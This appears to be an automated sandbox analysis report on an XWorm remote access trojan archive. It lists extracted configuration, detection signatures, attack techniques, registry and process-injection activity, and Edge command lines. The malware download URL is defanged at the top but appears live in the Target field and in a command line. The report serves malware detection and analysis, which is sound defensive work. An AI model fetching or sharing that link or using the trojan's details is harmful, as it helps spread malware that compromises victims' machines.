xworm | hxxps://www[.]upload[.]ee/download/15657107/813ac1d2bfa81d7f177e/XWorm-V5[.]0[.]rar

Resubmissions

30-12-2024 20:44

241230-zjcjfazrhy 8

26-11-2024 18:42

26-11-2024 18:41

11-04-2024 09:32

11-04-2024 09:21

Analysis

max time kernel
564s
max time network
564s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
11-04-2024 09:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.upload.ee/download/15657107/813ac1d2bfa81d7f177e/XWorm-V5.0.rar

Score

10^/10

xworm ransomware rat trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:7000

Mutex

cYnFSQs0oL87TAxW

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000100000002a872-1159.dat	family_xworm
behavioral1/files/0x000200000002a878-1172.dat	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 4 IoCs

flow	pid	Process
92	1916	powershell.exe
95	3820	powershell.exe
97	3324	powershell.exe
99	1052	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
1380	XWorm.exe
4468	XWorm.exe

Loads dropped DLL 1 IoCs

pid	Process
3488	XHVNC.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs

Web Service

T1102

flow	ioc
30	camo.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ENC.img"	XWorm.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3468 set thread context of 4628	3468	xworm.exe	110
PID 2320 set thread context of 3008	2320	xworm.exe	125
PID 2308 set thread context of 4216	2308	xworm.exe	135
PID 2864 set thread context of 3532	2864	xworm.exe	145

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
3336	3468	WerFault.exe	107
3660	2320	WerFault.exe	124
4004	2308	WerFault.exe	134
4208	2864	WerFault.exe	144

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Command Reciever.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Command Reciever.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 49 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	Command Reciever.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\SniffedFolderType = "Generic"	Command Reciever.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\3\0\0	Command Reciever.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg	Command Reciever.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	Command Reciever.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1637591879-962683004-3585269084-1000\{A42D8015-168D-46CF-A49C-1516FBF4FEB8}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\lib_auto_file\shell	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings	Command Reciever.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\lib_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe\" \"%1\""	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\ns	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Command Reciever.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\哄翹\ = "lib_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\䪀ᩀ虳退㤀㙭ȋ	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\䪀ᩀ虳退㤀㙭ȋ\ = "lib_auto_file"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	Command Reciever.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Command Reciever.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Command Reciever.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\3\0	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\lib_auto_file\shell\Read	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	Command Reciever.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\.lib\ = "lib_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\3	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\.lib	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\\ = "lib_auto_file"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	Command Reciever.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\哄翹	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202	Command Reciever.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	Command Reciever.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\♀㚅ȋ\ = "lib_auto_file"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	Command Reciever.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\lib_auto_file\shell\Read\command	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\lib_auto_file	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\♀㚅ȋ	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000_Classes\ns\ = "lib_auto_file"	OpenWith.exe

NTFS ADS 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main.zip:Zone.Identifier	msedge.exe
File created	C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe\:Zone.Identifier:$DATA	XWorm RAT V2.1.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1280	msedge.exe
1280	msedge.exe
3160	msedge.exe
3160	msedge.exe
3328	identity_helper.exe
3328	identity_helper.exe
1864	msedge.exe
1864	msedge.exe
1500	msedge.exe
1500	msedge.exe
2988	msedge.exe
2988	msedge.exe
1916	powershell.exe
1916	powershell.exe
1916	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
3820	powershell.exe
3820	powershell.exe
3820	powershell.exe
2292	powershell.exe
2292	powershell.exe
2292	powershell.exe
3324	powershell.exe
3324	powershell.exe
3324	powershell.exe
3008	powershell.exe
3008	powershell.exe
3008	powershell.exe
1052	powershell.exe
1052	powershell.exe
1052	powershell.exe
1080	powershell.exe
1080	powershell.exe
1080	powershell.exe
2860	msedge.exe
2860	msedge.exe
2860	msedge.exe
2860	msedge.exe
2016	msedge.exe
2016	msedge.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
1520	OpenWith.exe
3488	XHVNC.exe
3364	Command Reciever.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 23 IoCs

pid	Process
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	1916	powershell.exe
Token: SeDebugPrivilege	1448	powershell.exe
Token: SeDebugPrivilege	3820	powershell.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeDebugPrivilege	3008	powershell.exe
Token: SeDebugPrivilege	1052	powershell.exe
Token: SeDebugPrivilege	1080	powershell.exe
Token: SeDebugPrivilege	1380	XWorm.exe

Suspicious use of FindShellTrayWindow 59 IoCs

pid	Process
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3364	Command Reciever.exe

Suspicious use of SendNotifyMessage 13 IoCs

pid	Process
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3160	msedge.exe
3364	Command Reciever.exe

Suspicious use of SetWindowsHookEx 20 IoCs

pid	Process
1520	OpenWith.exe
1520	OpenWith.exe
1520	OpenWith.exe
1520	OpenWith.exe
1520	OpenWith.exe
1520	OpenWith.exe
1520	OpenWith.exe
1520	OpenWith.exe
1520	OpenWith.exe
1520	OpenWith.exe
1520	OpenWith.exe
4864	AcroRd32.exe
4864	AcroRd32.exe
4864	AcroRd32.exe
4864	AcroRd32.exe
3488	XHVNC.exe
3488	XHVNC.exe
3364	Command Reciever.exe
3364	Command Reciever.exe
3364	Command Reciever.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3160 wrote to memory of 3720	3160	msedge.exe	76
PID 3160 wrote to memory of 3720	3160	msedge.exe	76
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1072	3160	msedge.exe	77
PID 3160 wrote to memory of 1280	3160	msedge.exe	78
PID 3160 wrote to memory of 1280	3160	msedge.exe	78
PID 3160 wrote to memory of 2064	3160	msedge.exe	79
PID 3160 wrote to memory of 2064	3160	msedge.exe	79
PID 3160 wrote to memory of 2064	3160	msedge.exe	79
PID 3160 wrote to memory of 2064	3160	msedge.exe	79
PID 3160 wrote to memory of 2064	3160	msedge.exe	79
PID 3160 wrote to memory of 2064	3160	msedge.exe	79
PID 3160 wrote to memory of 2064	3160	msedge.exe	79
PID 3160 wrote to memory of 2064	3160	msedge.exe	79
PID 3160 wrote to memory of 2064	3160	msedge.exe	79
PID 3160 wrote to memory of 2064	3160	msedge.exe	79
PID 3160 wrote to memory of 2064	3160	msedge.exe	79
PID 3160 wrote to memory of 2064	3160	msedge.exe	79
PID 3160 wrote to memory of 2064	3160	msedge.exe	79
PID 3160 wrote to memory of 2064	3160	msedge.exe	79
PID 3160 wrote to memory of 2064	3160	msedge.exe	79
PID 3160 wrote to memory of 2064	3160	msedge.exe	79
PID 3160 wrote to memory of 2064	3160	msedge.exe	79
PID 3160 wrote to memory of 2064	3160	msedge.exe	79
PID 3160 wrote to memory of 2064	3160	msedge.exe	79
PID 3160 wrote to memory of 2064	3160	msedge.exe	79

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.upload.ee/download/15657107/813ac1d2bfa81d7f177e/XWorm-V5.0.rar
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3160
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9467c3cb8,0x7ff9467c3cc8,0x7ff9467c3cd8
  2⤵
  PID:3720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1892 /prefetch:2
  2⤵
  PID:1072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:8
  2⤵
  PID:2064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1
  2⤵
  PID:1916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
  2⤵
  PID:1656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1
  2⤵
  PID:1392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4640 /prefetch:1
  2⤵
  PID:1764
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5652 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:1
  2⤵
  PID:3724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3952 /prefetch:1
  2⤵
  PID:4124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:1
  2⤵
  PID:3488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5576 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1868,2198752658429518309,6598415356378330386,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5884 /prefetch:1
  2⤵
  PID:3456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
